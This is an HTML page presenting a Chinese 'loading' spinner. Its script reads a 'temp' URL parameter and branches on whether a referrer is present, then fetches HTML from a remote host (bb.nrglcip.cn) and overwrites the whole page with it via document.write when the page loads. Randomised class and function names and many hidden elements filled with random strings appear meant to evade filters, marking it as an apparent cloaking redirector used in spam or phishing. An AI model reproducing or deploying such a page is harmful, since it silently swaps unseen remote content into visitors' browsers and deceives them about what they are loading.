<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NIleEEUhB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NIleEEUhB .O5zuilBr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NIleEEUhB .content {
            line-height: 50px;
            text-align: center
        }

        .NIleEEUhB .img {
            width: 100%
        }

        .NIleEEUhB .oyVk39 {
            text-align: center
        }

        .NIleEEUhB .oyVk39 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NIleEEUhB .oyVk39 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NIleEEUhB .oyVk39 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NIleEEUhB .oyVk39 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NIleEEUhB .oyVk39 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NIleEEUhB .oyVk39 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NIleEEUhB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qjVM8X2sw1n(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Say6bi = qjVM8X2sw1n('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Say6bi +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Say6bi +".html?a=share";
		}
		
        rwLLE162sz=url+"#"+new Date().getTime();
        rwLLE162sz && function() {
            $.get(rwLLE162sz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >bdbU1mMXq7HviPSJ3nPkY</h1>
<b style='display:none' >RyF9vMaV2FFotpDGm5jzL2JPVE7TI85U7oIjTsi95qjbpwBHwoKj3ttZgz0hHFUDaVbK</b>
<ul style='display:none' >IEq1SRdXQl4mWoIUWdiuPg4qkNYNuSQFKfGpU7Zpz7Js</ul>
<span style='display:none'>VZiuVz9U0VW5YwHxwynO9toP74UtJ9OpfRwOAvVdgts5R</span>
<img  src='' style='display:none'>
<ul style='display:none' >IEq1SRdXQl4mWoIUWdiuPg4qkNYNuSQFKfGpU7Zpz7Js</ul>
<a  href='#' style='display:none'>ppgxP7X17t930O8GlgIyo55WWkfuVsCIz0sxebTztbBKXLYd79C</a>
<div style='display:none'>kJUZ2IffcEiM5cijSGHlkQwGo2KlqwDJ6aUl4NH852oW7DK047kQb3Fr8xrbShZjdeLa7lcEtAcUZlTtEqymEIi5qj</div>
<span style='display:none'>VZiuVz9U0VW5YwHxwynO9toP74UtJ9OpfRwOAvVdgts5R</span>
<span style='display:none'>VZiuVz9U0VW5YwHxwynO9toP74UtJ9OpfRwOAvVdgts5R</span><div class="NIleEEUhB">
    <div class="O5zuilBr">
        <div class="oyVk39">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>tUF9RZxoZ80H8systp7v7UIE6bU4Zx5cWgT66aA3PBiPw5KOXlNjqTdhTCOrFRKk5puXfFUYM4rNUrZhGQ8IN3XiC</span>
<div style='display:none'>PbpiXH11UYi3hTwO3MFxHKfpVs8zkjvpulwKEx8umqUbmqwluAGsSu8aCjikkTOL9687CDbJA7EHXJiReB8g1Q7dAYifF</div>
<a  href='#' style='display:none'>warmLc5YxaHiOz5U13kNoxTyfT</a>
<h1 style='display:none' >dtQM6tW6fFCvbWZBypl2gTgROVqRpyQLWTofeIwGY7vLblYSet9zhyvFoEXAShrQl8AY5nLTsyFdmcZxaflSzl1PW</h1>
<b style='display:none' >LERX8zOUkdsNzoL93p05sMDjbUbksKT09QMAbxo4okaT0uxGrMXRX</b>
<h1 style='display:none' >dtQM6tW6fFCvbWZBypl2gTgROVqRpyQLWTofeIwGY7vLblYSet9zhyvFoEXAShrQl8AY5nLTsyFdmcZxaflSzl1PW</h1></body>
</html>